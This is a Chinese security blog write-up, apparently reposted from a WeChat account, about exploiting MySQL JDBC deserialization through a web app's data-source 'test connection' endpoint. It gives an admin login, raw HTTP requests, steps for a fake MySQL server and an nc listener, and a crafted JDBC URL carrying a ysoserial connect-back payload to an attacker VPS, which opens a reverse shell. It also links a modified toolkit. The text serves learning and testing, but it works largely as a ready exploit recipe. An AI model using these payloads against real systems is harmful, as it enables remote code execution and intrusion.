记一次mysql jdbc反序列化-实现java代码执行

admin

138635
文章

114
评论

2021年4月4日01:00:50评论217 views字数 2508阅读8分21秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

授权转载，文章来源：“P喵呜-PHPoop”语雀

0x00 前言

过了几个月了，也修复了，应该可以放出来了。为了我的狗命，老样子，站点域名就改为http://test.phpoop.com保护我自己。之前遇到的时候感觉挺有意思的，所以放出来大家一起学习学习。

0x01 详情

登录地址如下，先登录管理员。

http://test.phpoop.com/login?redirect=%2Fworkbench%2Fhome

账号：admin
密码：Admin@2020!

POST /data-server/rest/dataSourceService/testConnection HTTP/1.1Host: test.phpoop.comContent-Length: 143Accept: application/json, text/plain, */*Origin: http://test.phpoop.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Content-Type: application/json;charset=UTF-8Referer: http://test.phpoop.com/sjck/sjck_sjy/dataSource?noModule=false&modelName=%E6%95%B0%E6%8D%AE%E6%BA%90Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: JSESSIONID=3dc22923-2f78-4171-afd3-526b2c4ccfb0Connection: close
{"dsType":1,"dsName":"test","remark":"测试一下看看","username":"root","passwd":"root","url":"jdbc:mysql://<host>:<port>/<database_name>"}

看样子是可以访问我们服务器的，并且查看报错是java的，所以可以尝试jdbc反序列化拿shell，推荐直接下载我这里提供好的，因为这个里面改过了，所以才能命令执行。

https://www.yuque.com/attachments/yuque/0/2021/zip/297422/1617096871598-6f6c0957-9540-4af8-9a6b-17a4fd5c4d42.zip

cd /MySQL_Fake_Serverpython3 server.py

注意：一般来说启动成功的端口是3306才对，但是我vps已经有3306端口了，所以我修改了MySQL_Fake_Server目录的server.py文件。

记一次mysql jdbc反序列化-实现java代码执行

接着vps启动nc监听8021端口

nc -lvvp 8021

接着修改为下面这样的数据包：‍

POST /data-server/rest/dataSourceService/testConnection HTTP/1.1Host: test.phpoop.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 268Origin: http://test.phpoop.comConnection: closeReferer: http://test.phpoop.com/sjck/sjck_sjy/dataSource?noModule=false&modelName=%E6%95%B0%E6%8D%AE%E6%BA%90Cookie: JSESSIONID=3dc22923-2f78-4171-afd3-526b2c4ccfb0
{"dsName":"test","remark":"1","dsType":1,"url":"jdbc:mysql://123.207.14.227:3307/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","username":"yso_CommonsBeanutils1_connectback:123.207.14.227:8021","passwd":"123"}

注意：

123.207.14.227:3307 == vps-ip与MySQL_Fake_Server启动的3307端口
123.207.14.227:8021 == vps-ip与nc监听8021端口

然后发包即可

只需关注公众号并回复“9527”即可获取一套HTB靶场学习文档和视频，“1120”获取安全参考等安全杂志PDF电子版，“1208”获取个人常用高效爆破字典，“0221”获取2020年酒仙桥文章打包，还在等什么？赶紧关注学习吧！

推荐阅读

欢迎私下骚扰

本文始发于微信公众号（潇湘信安）：记一次mysql jdbc反序列化-实现java代码执行

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

记一次mysql jdbc反序列化-实现java代码执行

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论

在线咨询

微信